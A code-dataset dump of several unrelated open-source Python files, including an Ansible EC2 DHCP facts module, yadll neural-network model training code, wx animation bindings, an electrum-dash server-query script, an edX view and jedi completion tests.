# # Note: These examples do not set authentication details, see the AWS Guide for details.
- name: Gather facts about all DHCP Option sets for an account or profile
ec2_vpc_dhcp_options_facts:
region: ap-southeast-2
profile: production
register: dhcp_facts
- name: Gather facts about a filtered list of DHCP Option sets
ec2_vpc_dhcp_options_facts:
region: ap-southeast-2
profile: production
filters:
"tag:Name": "abc-123"
register: dhcp_facts
- name: Gather facts about a specific DHCP Option set by DhcpOptionId
ec2_vpc_dhcp_options_facts:
region: ap-southeast-2
profile: production
DhcpOptionsIds: dopt-123fece2
register: dhcp_facts
'''
RETURN = '''
dhcp_options:
description: The dhcp option sets for the account
returned: always
type: list
changed:
description: True if listing the dhcp options succeeds
type: bool
returned: always
'''
import json
try:
import botocore
import boto3
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
def get_dhcp_options_info(dhcp_option):
    """Project the fields of interest out of one raw DHCP options entry.

    Keeps only 'DhcpOptionsId', 'DhcpConfigurations' and 'Tags' from the
    dict returned by EC2's describe_dhcp_options.
    """
    return {
        'DhcpOptionsId': dhcp_option['DhcpOptionsId'],
        'DhcpConfigurations': dhcp_option['DhcpConfigurations'],
        'Tags': dhcp_option['Tags'],
    }
def list_dhcp_options(client, module):
    """Describe DHCP option sets and exit the module with the results.

    Builds describe_dhcp_options parameters from the module arguments
    ('filters', 'DryRun', 'DhcpOptionsIds'), calls EC2, snake-cases each
    result and terminates the module via module.exit_json (this function
    does not return normally) or module.fail_json on a client error.
    """
    params = dict()
    filters = module.params.get('filters')
    if filters:
        params['Filters'] = []
        for key, value in filters.iteritems():
            temp_dict = dict()
            temp_dict['Name'] = key
            # The EC2 API expects 'Values' to be a list even for one value.
            if isinstance(value, basestring):
                temp_dict['Values'] = [value]
            else:
                temp_dict['Values'] = value
            params['Filters'].append(temp_dict)
    if module.params.get("DryRun"):
        params['DryRun'] = module.params.get("DryRun")
    if module.params.get("DhcpOptionsIds"):
        params['DhcpOptionsIds'] = module.params.get("DhcpOptionsIds")
    try:
        all_dhcp_options = client.describe_dhcp_options(**params)
    except botocore.exceptions.ClientError as e:
        module.fail_json(msg=str(e))
    # Trim each entry to the fields of interest, then snake-case the keys
    # for Ansible-style output.
    all_dhcp_options_array = [get_dhcp_options_info(dhcp_option)
                              for dhcp_option in all_dhcp_options['DhcpOptions']]
    snaked_dhcp_options_array = [camel_dict_to_snake_dict(dhcp_option)
                                 for dhcp_option in all_dhcp_options_array]
    module.exit_json(dhcp_options=snaked_dhcp_options_array)
def main():
    """Ansible module entry point.

    Parses arguments, builds a boto3 EC2 client and delegates to
    list_dhcp_options, which emits the module result.
    """
    argument_spec = ec2_argument_spec()
    argument_spec.update(
        dict(
            filters = dict(type='dict', default=None, ),
            DryRun = dict(type='bool', default=False),
            DhcpOptionsIds = dict(type='list', default=None)
        )
    )
    module = AnsibleModule(argument_spec=argument_spec)
    # Validate Requirements
    if not HAS_BOTO3:
        module.fail_json(msg='json and botocore/boto3 is required.')
    try:
        region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
        connection = boto3_conn(module, conn_type='client', resource='ec2', region=region, endpoint=ec2_url, **aws_connect_kwargs)
    except botocore.exceptions.NoCredentialsError as e:
        module.fail_json(msg="Can't authorize connection - "+str(e))
    # call your function here
    results = list_dhcp_options(connection, module)
    # NOTE(review): list_dhcp_options already calls module.exit_json(), which
    # ends the process, so the exit_json below looks unreachable — confirm.
    module.exit_json(result=results)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| gpl-3.0 |
pchavanne/yadll | yadll/model.py | 2 | 16213 | # -*- coding: UTF-8 -*-
import pickle
import sys
import yadll
from .layers import *
from .exceptions import *
import logging
logger = logging.getLogger(__name__)
def save_model(model, file=None):
    """
    Pickle the model to disk.

    Used by the training loop to persist the model state.

    Parameters
    ----------
    model : :class:`yadll.model.Model`
        model to be saved in file
    file : `string`
        target file name; falls back to ``model.file`` when omitted. If
        neither is set, an error is logged and nothing is written.
    """
    target = file if file is not None else model.file
    if target is None:
        logger.error('No file name. Model not saved.')
        return
    try:
        with open(target, 'wb') as f:
            pickle.dump(model, f, pickle.HIGHEST_PROTOCOL)
    except RuntimeError:
        # Deeply nested models can exceed the default recursion limit
        # while pickling; raise it and retry once.
        sys.setrecursionlimit(5000)
        with open(target, 'wb') as f:
            pickle.dump(model, f, pickle.HIGHEST_PROTOCOL)
def load_model(file):
    """
    Load (unpickle) a model previously written by :func:`save_model`.

    Parameters
    ----------
    file : `string'
        file name

    Returns
    -------
    a :class:`yadll.model.Model`

    Examples
    --------
    >>> my_model = load_model('my_best_model.ym')
    """
    with open(file, 'rb') as f:
        return pickle.load(f)
class Model(object):
"""
The :class:`yadll.model.Model` contains the data, the network, the hyperparameters,
and the report.
It pre-trains unsupervised layers, trains the network and save it to file.
Parameters
----------
network : :class:`yadll.network.Network`
the network to be trained
data : :class:`yadll.data.Data`
the training, validating and testing set
name : `string`
the name of the model
updates : :func:`yadll.updates`
an update function
file : `string`
name of the file to save the model. If omitted a name is generated with
the model name + date + time of training
"""
    def __init__(self, network=None, data=None, hyperparameters=None, name='model',
                 updates=sgd, objective=CCE, evaluation_metric=categorical_accuracy, file=None):
        self.network = network
        self.data = data  # data [(train_set_x, train_set_y), (valid_set_x, valid_set_y), (test_set_x, test_set_y)]
        self.data_shape = None          # filled from self.data at compile time
        self.has_validation = None      # set in train() when a validation set exists
        self.name = name
        self.hp = hyperparameters
        self.updates = updates
        self.objective = objective
        self.metric = evaluation_metric
        self.early_stop = None
        self.file = file
        self.save_mode = None  # None, 'end' or 'each'
        # Symbolic Theano variables used when compiling train/valid/test functions
        self.index = T.iscalar()  # index to a [mini]batch
        self.epoch_index = T.ivector()  # index per epoch
        self.x = self.y = None  # T.matrix(name='y')
        # Compiled Theano functions; created lazily by compile()
        self.train_func = self.validate_func = self.test_func = self.predict_func = None
        self.report = dict()
@timer(' Compiling')
def compile(self, compile_arg):
"""
Compile theano functions of the model
Parameters
----------
compile_arg: `string` or `List` of `string`
value can be 'train', 'validate', 'test', 'predict' and 'all'
"""
if self.data is None and self.data_shape is None:
raise NoDataFoundException
if self.data_shape is None:
self.data_shape = self.data.shape()
# X & Y get their shape from data
if self.x is None:
x_dim = len(self.data_shape[0][0])
x_tensor_type = T.TensorType(dtype=floatX, broadcastable=(False,)*x_dim)
self.x = x_tensor_type('x')
if self.y is None:
y_dim = len(self.data_shape[0][1])
y_tensor_type = T.TensorType(dtype=floatX, broadcastable=(False,)*y_dim)
self.y = y_tensor_type('y')
if self.network is None:
raise NoNetworkFoundException
else:
if self.network.layers[0].input is None:
self.network.layers[0].input = self.x
################################################
# cost
cost = T.mean(self.objective(prediction=self.network.get_output(stochastic=True), target=self.y))
# add regularisation
cost += self.network.reguls
################################################
# Updates
# updates of the model as a list of (variable, update expression) pairs
update_param = {}
if hasattr(self.hp, 'learning_rate'):
update_param['learning_rate'] = self.hp.learning_rate
if hasattr(self.hp, 'momentum'):
update_param['momentum'] = self.hp.momentum
if hasattr(self.hp, 'epsilon'):
update_param['epsilon'] = self.hp.epsilon
if hasattr(self.hp, 'rho'):
update_param['rho'] = self.hp.rho
if hasattr(self.hp, 'beta1'):
update_param['beta1'] = self.hp.beta1
if hasattr(self.hp, 'beta2'):
update_param['beta2'] = self.hp.beta1
updates = self.updates(cost, self.network.params, **update_param)
################################################
# Validation & Test functions
error = categorical_error(self.network.get_output(stochastic=False), self.y)
################################################
# functions for training, validating and testing the model
logger.info('... Compiling the model')
if 'train' in compile_arg or 'all' in compile_arg:
self.train_func = theano.function(inputs=[self.index, self.epoch_index], outputs=cost, updates=updates, name='train', # on_unused_input='ignore', # mode='DebugMode',
givens={self.x: self.data.train_set_x[self.epoch_index[self.index * self.hp.batch_size: (self.index + 1) * self.hp.batch_size]],
self.y: self.data.train_set_y[self.epoch_index[self.index * self.hp.batch_size: (self.index + 1) * self.hp.batch_size]]})
if 'validate' in compile_arg or 'all' in compile_arg:
self.validate_func = theano.function(inputs=[self.index], outputs=error, name='validate',
givens={self.x: self.data.valid_set_x[self.index * self.hp.batch_size: (self.index + 1) * self.hp.batch_size],
self.y: self.data.valid_set_y[self.index * self.hp.batch_size: (self.index + 1) * self.hp.batch_size]})
if 'test' in compile_arg or 'all' in compile_arg:
self.test_func = theano.function(inputs=[self.index], outputs=error, name='test',
givens={self.x: self.data.test_set_x[self.index * self.hp.batch_size: (self.index + 1) * self.hp.batch_size],
self.y: self.data.test_set_y[self.index * self.hp.batch_size: (self.index + 1) * self.hp.batch_size]})
################################################
# functions for predicting
if 'predict' in compile_arg or 'all' in compile_arg:
prediction = self.network.get_output(stochastic=False)
self.predict_func = theano.function(inputs=[self.x], outputs=prediction, name='predict')
    @timer(' Unsupervised Pre-Training')
    def pretrain(self):
        """
        Pre-training of the unsupervised layers sequentially

        Trains each :class:`UnsupervisedLayer` of the network, in layer
        order, on the training inputs.

        Returns
        -------
        update unsupervised layers weights
        """
        if self.data is None:
            raise NoDataFoundException
        if self.network is None:
            raise NoNetworkFoundException
        else:
            # Wire the symbolic input into the first layer if not already done.
            if self.network.layers[0].input is None:
                self.network.layers[0].input = self.x
        for layer in self.network.layers:
            if isinstance(layer, UnsupervisedLayer):
                layer.unsupervised_training(self.x, self.data.train_set_x)
@timer(' Training')
def train(self, unsupervised_training=True, save_mode=None, early_stop=True, shuffle=True, **kwargs):
"""
Training the network
Parameters
----------
unsupervised_training: `bool`, (default is True)
pre-training of the unsupervised layers if any
save_mode : {None, 'end', 'each'}
None (default), model will not be saved unless name specified in the
model definition.
'end', model will only be saved at the end of the training
'each', model will be saved each time the model is improved
early_stop : `bool`, (default is True)
early stopping when validation score is not improving
shuffle : `bool`, (default is True)
reshuffle the training set at each epoch. Batches will then be different from one epoch to another
Returns
-------
report
"""
start_time = timeit.default_timer()
if self.data is None:
raise NoDataFoundException
if self.network is None:
raise NoNetworkFoundException
if self.data.valid_set_x is not None:
self.has_validation = True
self.early_stop = early_stop and self.has_validation
################################################
# Compile if not done already
if self.train_func is None:
compile_arg = kwargs.pop('compile_arg', ['train', 'test'])
if self.has_validation:
compile_arg.append('validate')
self.compile(compile_arg=compile_arg)
if unsupervised_training and self.network.has_unsupervised_layer:
self.pretrain()
if save_mode is not None:
if save_mode not in ['end', 'each']:
self.save_mode = 'end'
else:
self.save_mode = save_mode
if self.file is None:
import datetime
self.file = self.name + '_' + datetime.datetime.now().strftime('%Y%m%d%H%M%S') + '.ym'
if self.file is not None and save_mode is None:
self.save_mode = 'end'
n_train_batches = self.data.train_set_x.get_value(borrow=True).shape[0] // self.hp.batch_size
n_test_batches = self.data.test_set_x.get_value(borrow=True).shape[0] // self.hp.batch_size
if self.has_validation:
n_valid_batches = self.data.valid_set_x.get_value(borrow=True).shape[0] // self.hp.batch_size
train_idx = np.arange(n_train_batches * self.hp.batch_size, dtype='int32')
self.report['test_values'] = []
self.report['validation_values'] = []
################################################
# Training
logger.info('... Training the model')
# early-stopping parameters
patience = self.hp.patience # look at this many batches regardless
patience_increase = 2 # wait this much longer when a new best is found
improvement_threshold = 0.995 # a relative improvement of this much is considered significant
validation_frequency = min(n_train_batches, patience / 2) # go through this many minibatches before checking the network
best_validation_loss = np.inf
best_iter = 0
test_score = 0.
epoch = 0
done_looping = False
while (epoch < self.hp.n_epochs) and (not done_looping):
epoch += 1
if shuffle:
np_rng.shuffle(train_idx)
for minibatch_index in range(n_train_batches):
# train
minibatch_avg_cost = self.train_func(minibatch_index, train_idx)
# iteration number
iter = (epoch - 1) * n_train_batches + minibatch_index
if (iter + 1) % validation_frequency == 0:
# compute zero-one loss on validation set
validation_losses = [self.validate_func(i) for i
in range(n_valid_batches)]
this_validation_loss = np.mean(validation_losses)
logger.info('epoch %i, minibatch %i/%i, validation error %.3f %%' %
(epoch, minibatch_index + 1, n_train_batches, this_validation_loss * 100.))
self.report['validation_values'].append((iter + 1, this_validation_loss * 100.))
# if we got the best validation score until now
if this_validation_loss < best_validation_loss:
# improve patience if loss improvement is good enough
if this_validation_loss < best_validation_loss * improvement_threshold:
patience = max(patience, iter * patience_increase)
best_validation_loss = this_validation_loss
best_iter = iter
# test it on the test set
test_losses = [self.test_func(i) for i in range(n_test_batches)]
test_score = np.mean(test_losses)
logger.info(' epoch %i, minibatch %i/%i, test error of best model %.3f %%' %
(epoch, minibatch_index + 1, n_train_batches, test_score * 100.))
self.report['test_values'].append((epoch, test_score * 100))
# save and overwrite each best model
if self.save_mode == 'each':
save_model(self)
logger.info(' Best model saved')
if patience <= iter:
done_looping = True
break
end_time = timeit.default_timer()
# save the final model
if self.save_mode == 'end':
save_model(self)
logger.info(' Final model saved as : ' + self.file)
logger.info('\n Optimization completed. ' + ('Early stopped at epoch: %i' % epoch)
if done_looping else 'Optimization completed. ' + ('Trained on all %i epochs' % epoch))
logger.info(' Validation score of %.3f %% obtained at iteration %i, with test performance %.3f %%' %
(best_validation_loss * 100., best_iter + 1, test_score * 100.))
# Report
self.report['epoch'] = epoch
self.report['early_stop'] = done_looping
self.report['best_validation'] = best_validation_loss * 100.
self.report['best_iter'] = best_iter + 1
self.report['test_score'] = test_score * 100.
self.report['training_duration'] = format_sec(end_time - start_time)
return self.report
    def predict(self, X):
        """Return the network's deterministic output for input ``X``.

        Compiles the prediction function lazily on first use.
        """
        if self.predict_func is None:
            self.compile(compile_arg='predict')
        return self.predict_func(X)
    def to_conf(self, file=None):
        """
        Save model as a conf object or conf file

        Parameters
        ----------
        file : `string`, optional
            when given, the conf dict is pickled to this file and nothing
            is returned; otherwise the conf dict is returned.

        Returns
        -------
        dict or None
            the configuration dict when ``file`` is None.
        """
        # ``updates`` is stored by name so from_conf() can look it up
        # again in yadll.updates.
        conf = {'model name': self.name,
                'hyperparameters': self.hp.to_conf(),
                'network': self.network.to_conf(),
                'updates': self.updates.__name__,
                'data_shape': self.data_shape,
                'report': self.report,
                'file': self.file}
        if file is None:
            return conf
        else:
            with open(file, 'wb') as f:
                pickle.dump(conf, f, pickle.HIGHEST_PROTOCOL)
    def from_conf(self, conf):
        """
        build model from conf object or conf file

        Parameters
        ----------
        conf : dict or `string`
            a conf dict as produced by :meth:`to_conf`, or the name of a
            pickle file containing one.
        """
        if isinstance(conf, str):
            with open(conf, 'rb') as f:
                _conf = pickle.load(f)
        else:
            # Shallow copy so the caller's dict is not mutated.
            _conf = conf.copy()
        self.name = _conf['model name']
        self.hp = yadll.hyperparameters.Hyperparameters()
        for k, v in _conf['hyperparameters'].items():
            self.hp(k, v)
        self.network = yadll.network.Network()
        self.network.from_conf(_conf['network'])
        # Updates were stored by name; resolve back to the function.
        self.updates = getattr(yadll.updates, _conf['updates'])
        self.report = _conf['report']
        self.file = _conf['file']
        self.data_shape = _conf['data_shape']
| mit |
HyperloopTeam/FullOpenMDAO | lib/python2.7/site-packages/traits-4.3.0-py2.7-macosx-10.10-x86_64.egg/traits/util/home_directory.py | 1 | 1435 | #------------------------------------------------------------------------------
# Copyright (c) 2005, 2006 by Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought util package component>
#------------------------------------------------------------------------------
import os
def get_home_directory():
    """Determine the user's home directory.

    Checks the 'HOME' and 'USERPROFILE' environment variables in that
    order ('HOME' should work on most Unixes, 'USERPROFILE' on Windows)
    and returns the first one found, guaranteed to end with the platform
    path separator. Returns '' when neither variable is set.
    """
    # FIXME: Is this really better than the following??
    #        path = os.path.expanduser('~')
    # The above seems to work on both Windows and Unixes though the docs
    # indicate it might not work as well on Macs.
    for name in ['HOME', 'USERPROFILE']:
        # 'name in os.environ' replaces the deprecated dict.has_key().
        if name in os.environ:
            # Make sure that the path ends with a path separator.
            path = os.environ[name]
            if path[-1] != os.path.sep:
                path += os.path.sep
            break

    # If all else fails, the current directory will do.
    else:
        path = ''

    return path
| gpl-2.0 |
mazaclub/electrum-dash | scripts/util.py | 2 | 2083 | import time, electrum, Queue
from electrum_dash import Interface, SimpleConfig
from electrum_dash.network import filter_protocol, parse_servers
# electrum_dash.util.set_verbosity(1)
def get_peers():
    """Connect to a known electrum-dash server and return its peer list.

    Returns the peers advertised by ecdsa.net, filtered to those
    reachable over SSL ('s' protocol).
    """
    # 1. start interface and wait for connection
    q = Queue.Queue()
    interface = electrum_dash.Interface('ecdsa.net:110:s', q)
    interface.start()
    i, r = q.get()
    if not interface.is_connected():
        raise BaseException("not connected")
    # 2. get list of peers
    interface.send_request({'id':0, 'method':'server.peers.subscribe','params':[]})
    # NOTE(review): Queue.get timeout is in seconds, so 10000 is ~2.8 hours —
    # presumably intended to be much smaller; confirm.
    i, r = q.get(timeout=10000)
    peers = parse_servers(r.get('result'))
    peers = filter_protocol(peers,'s')
    i.stop()
    return peers
def send_request(peers, request):
    """Broadcast `request` to every server in `peers` and collect replies.

    Starts one Interface per server, waits (up to ~10s) for connections,
    sends the request to each reachable server and gathers the 'result'
    field of each answer, again with a ~10s overall timeout.

    Returns a dict mapping server identifier -> response result.
    Note: mutates the `peers` list passed in (entries are removed as
    their connection attempts resolve).
    """
    print "Contacting %d servers"%len(peers)
    # start interfaces
    q2 = Queue.Queue()
    config = SimpleConfig()
    interfaces = map(lambda server: Interface(server, q2, config), peers)
    reached_servers = []
    for i in interfaces:
        i.start()
    t0 = time.time()
    # Phase 1: wait for each interface to report connection success/failure.
    while peers:
        try:
            i, r = q2.get(timeout=1)
        except:
            # Queue.Empty: keep polling until the 10 second budget runs out.
            if time.time() - t0 > 10:
                print "timeout"
                break
            else:
                continue
        if i.server in peers:
            peers.remove(i.server)
            if i.is_connected():
                reached_servers.append(i)
            else:
                print "Connection failed:", i.server
    print "%d servers could be reached"%len(reached_servers)
    # Phase 2: send the request to every reachable server and collect answers.
    results_queue = Queue.Queue()
    for i in reached_servers:
        i.send_request(request, results_queue)
    results = {}
    t0 = time.time()
    while reached_servers:
        try:
            i, r = results_queue.get(timeout=1)
        except:
            if time.time() - t0 > 10:
                break
            else:
                continue
        results[i.server] = r.get('result')
        reached_servers.remove(i)
        i.stop()
    for i in reached_servers:
        print i.server, "did not answer"
    print "%d answers"%len(results)
    return results
| gpl-3.0 |
ezequielpereira/Time-Line | libs/wx/animate.py | 10 | 9600 | # This file was created automatically by SWIG 1.3.29.
# Don't modify this file, modify the SWIG interface instead.
"""
Simple animation player classes, including `GIFAnimationCtrl` for displaying
animated GIF files
"""
import _animate
import new
new_instancemethod = new.instancemethod
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'PySwigObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static) or hasattr(self,name):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError,name
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
import types
try:
_object = types.ObjectType
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
del types
def _swig_setattr_nondynamic_method(set):
def set_attr(self,name,value):
if (name == "thisown"): return self.this.own(value)
if hasattr(self,name) or (name == "this"):
set(self,name,value)
else:
raise AttributeError("You cannot add attributes to %s" % self)
return set_attr
import _core
import wx
__docfilter__ = wx._core.__DocFilter(globals())
ANIM_UNSPECIFIED = _animate.ANIM_UNSPECIFIED
ANIM_DONOTREMOVE = _animate.ANIM_DONOTREMOVE
ANIM_TOBACKGROUND = _animate.ANIM_TOBACKGROUND
ANIM_TOPREVIOUS = _animate.ANIM_TOPREVIOUS
ANIMATION_TYPE_INVALID = _animate.ANIMATION_TYPE_INVALID
ANIMATION_TYPE_GIF = _animate.ANIMATION_TYPE_GIF
ANIMATION_TYPE_ANI = _animate.ANIMATION_TYPE_ANI
ANIMATION_TYPE_ANY = _animate.ANIMATION_TYPE_ANY
class AnimationBase(_core.Object):
"""Proxy of C++ AnimationBase class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self): raise AttributeError, "No constructor defined"
__repr__ = _swig_repr
__swig_destroy__ = _animate.delete_AnimationBase
__del__ = lambda self : None;
def IsOk(*args, **kwargs):
"""IsOk(self) -> bool"""
return _animate.AnimationBase_IsOk(*args, **kwargs)
def GetDelay(*args, **kwargs):
"""GetDelay(self, int i) -> int"""
return _animate.AnimationBase_GetDelay(*args, **kwargs)
def GetFrameCount(*args, **kwargs):
"""GetFrameCount(self) -> int"""
return _animate.AnimationBase_GetFrameCount(*args, **kwargs)
def GetFrame(*args, **kwargs):
"""GetFrame(self, int i) -> Image"""
return _animate.AnimationBase_GetFrame(*args, **kwargs)
def GetSize(*args, **kwargs):
"""GetSize(self) -> Size"""
return _animate.AnimationBase_GetSize(*args, **kwargs)
def LoadFile(*args, **kwargs):
"""LoadFile(self, String name, int type=ANIMATION_TYPE_ANY) -> bool"""
return _animate.AnimationBase_LoadFile(*args, **kwargs)
def Load(*args, **kwargs):
"""Load(self, InputStream stream, int type=ANIMATION_TYPE_ANY) -> bool"""
return _animate.AnimationBase_Load(*args, **kwargs)
_animate.AnimationBase_swigregister(AnimationBase)
cvar = _animate.cvar
AnimationCtrlNameStr = cvar.AnimationCtrlNameStr
class Animation(AnimationBase):
"""Proxy of C++ Animation class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
__init__(self) -> Animation
__init__(self, String name, int type=ANIMATION_TYPE_ANY) -> Animation
"""
_animate.Animation_swiginit(self,_animate.new_Animation(*args))
__swig_destroy__ = _animate.delete_Animation
__del__ = lambda self : None;
def GetFramePosition(*args, **kwargs):
"""GetFramePosition(self, int frame) -> Point"""
return _animate.Animation_GetFramePosition(*args, **kwargs)
def GetFrameSize(*args, **kwargs):
"""GetFrameSize(self, int frame) -> Size"""
return _animate.Animation_GetFrameSize(*args, **kwargs)
def GetDisposalMethod(*args, **kwargs):
"""GetDisposalMethod(self, int frame) -> int"""
return _animate.Animation_GetDisposalMethod(*args, **kwargs)
def GetTransparentColour(*args, **kwargs):
"""GetTransparentColour(self, int frame) -> Colour"""
return _animate.Animation_GetTransparentColour(*args, **kwargs)
def GetBackgroundColour(*args, **kwargs):
"""GetBackgroundColour(self) -> Colour"""
return _animate.Animation_GetBackgroundColour(*args, **kwargs)
_animate.Animation_swigregister(Animation)
AC_NO_AUTORESIZE = _animate.AC_NO_AUTORESIZE
AC_DEFAULT_STYLE = _animate.AC_DEFAULT_STYLE
AN_FIT_ANIMATION = _animate.AN_FIT_ANIMATION
class AnimationCtrlBase(_core.Control):
"""Proxy of C++ AnimationCtrlBase class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self): raise AttributeError, "No constructor defined"
__repr__ = _swig_repr
def LoadFile(*args, **kwargs):
"""LoadFile(self, String filename, int type=ANIMATION_TYPE_ANY) -> bool"""
return _animate.AnimationCtrlBase_LoadFile(*args, **kwargs)
def SetAnimation(*args, **kwargs):
"""SetAnimation(self, Animation anim)"""
return _animate.AnimationCtrlBase_SetAnimation(*args, **kwargs)
def GetAnimation(*args, **kwargs):
"""GetAnimation(self) -> Animation"""
return _animate.AnimationCtrlBase_GetAnimation(*args, **kwargs)
Animation = property(GetAnimation,SetAnimation)
def Play(*args, **kwargs):
"""Play(self) -> bool"""
return _animate.AnimationCtrlBase_Play(*args, **kwargs)
def Stop(*args, **kwargs):
"""Stop(self)"""
return _animate.AnimationCtrlBase_Stop(*args, **kwargs)
def IsPlaying(*args, **kwargs):
"""IsPlaying(self) -> bool"""
return _animate.AnimationCtrlBase_IsPlaying(*args, **kwargs)
def SetInactiveBitmap(*args, **kwargs):
"""SetInactiveBitmap(self, Bitmap bmp)"""
return _animate.AnimationCtrlBase_SetInactiveBitmap(*args, **kwargs)
def GetInactiveBitmap(*args, **kwargs):
"""GetInactiveBitmap(self) -> Bitmap"""
return _animate.AnimationCtrlBase_GetInactiveBitmap(*args, **kwargs)
InactiveBitmap = property(GetInactiveBitmap,SetInactiveBitmap)
_animate.AnimationCtrlBase_swigregister(AnimationCtrlBase)
NullAnimation = cvar.NullAnimation
class AnimationCtrl(AnimationCtrlBase):
"""Proxy of C++ AnimationCtrl class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args, **kwargs):
"""
__init__(self, Window parent, int id=-1, Animation anim=NullAnimation,
Point pos=DefaultPosition, Size size=DefaultSize,
long style=AC_DEFAULT_STYLE, String name=AnimationCtrlNameStr) -> AnimationCtrl
"""
_animate.AnimationCtrl_swiginit(self,_animate.new_AnimationCtrl(*args, **kwargs))
self._setOORInfo(self)
def Create(*args, **kwargs):
"""
Create(self, Window parent, int id, Animation anim=NullAnimation,
Point pos=DefaultPosition, Size size=DefaultSize,
long style=AC_DEFAULT_STYLE, String name=AnimationCtrlNameStr) -> bool
"""
return _animate.AnimationCtrl_Create(*args, **kwargs)
def SetUseWindowBackgroundColour(*args, **kwargs):
"""SetUseWindowBackgroundColour(self, bool useWinBackground=True)"""
return _animate.AnimationCtrl_SetUseWindowBackgroundColour(*args, **kwargs)
def IsUsingWindowBackgroundColour(*args, **kwargs):
"""IsUsingWindowBackgroundColour(self) -> bool"""
return _animate.AnimationCtrl_IsUsingWindowBackgroundColour(*args, **kwargs)
def DrawCurrentFrame(*args, **kwargs):
"""DrawCurrentFrame(self, DC dc)"""
return _animate.AnimationCtrl_DrawCurrentFrame(*args, **kwargs)
def GetBackingStore(*args, **kwargs):
"""GetBackingStore(self) -> Bitmap"""
return _animate.AnimationCtrl_GetBackingStore(*args, **kwargs)
_animate.AnimationCtrl_swigregister(AnimationCtrl)
def PreAnimationCtrl(*args, **kwargs):
"""PreAnimationCtrl() -> AnimationCtrl"""
val = _animate.new_PreAnimationCtrl(*args, **kwargs)
return val
class GIFAnimationCtrl(AnimationCtrl):
"""
Backwards compatibility class for AnimationCtrl.
"""
def __init__(self, parent, id=-1, filename="",
pos=wx.DefaultPosition, size=wx.DefaultSize,
style=AC_DEFAULT_STYLE,
name="gifAnimation"):
AnimationCtrl.__init__(self, parent, id, NullAnimation, pos, size, style, name)
self.LoadFile(filename)
def GetPlayer(self):
return self
def UseBackgroundColour(self, useBackground=True):
self.SetUseWindowBackgroundColour(useBackground)
| gpl-3.0 |
chudaol/edx-platform | common/djangoapps/pipeline_js/views.py | 162 | 1215 | """
Views for returning XModule JS (used by requirejs)
"""
import json
from django.conf import settings
from django.http import HttpResponse
from staticfiles.storage import staticfiles_storage
from edxmako.shortcuts import render_to_response
def get_xmodule_urls():
    """
    Returns a list of the URLs to hit to grab all the XModule JS
    """
    module_js = settings.PIPELINE_JS['module-js']
    if settings.DEBUG:
        # In debug mode serve each source file individually, with coffee
        # sources mapped to their compiled .js counterparts.
        paths = [src.replace(".coffee", ".js")
                 for src in module_js['source_filenames']]
    else:
        # In production everything is bundled into a single output file.
        paths = [module_js['output_filename']]
    return [staticfiles_storage.url(p) for p in paths]
def xmodule_js_files(request):
    """
    View function that returns XModule URLs as a JSON list; meant to be used
    as an API

    Parameters
    ----------
    request : the incoming HTTP request (unused).
    """
    urls = get_xmodule_urls()
    return HttpResponse(json.dumps(urls), content_type="application/json")
def requirejs_xmodule(request):
    """
    View function that returns a requirejs-wrapped Javascript file that
    loads all the XModule URLs; meant to be loaded via requireJS

    Renders the "xmodule.js" template with the XModule URL list and
    serves it as text/javascript.
    """
    return render_to_response(
        "xmodule.js",
        {"urls": get_xmodule_urls()},
        content_type="text/javascript",
    )
| agpl-3.0 |
blueyed/jedi | test/completion/generators.py | 8 | 1887 | # -----------------
# yield statement
# -----------------
def gen():
yield 1
yield ""
gen_exe = gen()
#? int() str()
next(gen_exe)
#? int() str() list
next(gen_exe, list)
def gen_ret(value):
yield value
#? int()
next(gen_ret(1))
#? []
next(gen_ret())
# -----------------
# generators should not be indexable
# -----------------
def get(param):
yield 1
yield ""
#? []
get()[0]
# -----------------
# __iter__
# -----------------
for a in get():
#? int() str()
a
class Get():
def __iter__(self):
yield 1
yield ""
b = []
for a in Get():
#? int() str()
a
b += [a]
#? list()
b
#? int() str()
b[0]
g = iter(Get())
#? int() str()
next(g)
g = iter([1.0])
#? float()
next(g)
# -----------------
# __next__
# -----------------
class Counter:
def __init__(self, low, high):
self.current = low
self.high = high
def __iter__(self):
return self
def next(self):
""" need to have both __next__ and next, because of py2/3 testing """
return self.__next__()
def __next__(self):
if self.current > self.high:
raise StopIteration
else:
self.current += 1
return self.current - 1
for c in Counter(3, 8):
#? int()
print c
# -----------------
# tuples
# -----------------
def gen():
if a:
yield 1, ""
else:
yield 2, 1.0
a, b = next(gen())
#? int()
a
#? str() float()
b
def simple():
yield 1
yield ''
a, b = simple()
#? int()
a
#? str()
b
# -----------------
# More complicated access
# -----------------
# `close` is a method wrapper.
#? ['__call__']
gen().close.__call__
#?
gen().throw()
#? ['co_consts']
gen().gi_code.co_consts
#? []
gen.gi_code.co_consts
# `send` is also a method wrapper.
#? ['__call__']
gen().send.__call__
#? tuple()
gen().send()
#?
gen()()
| mit |
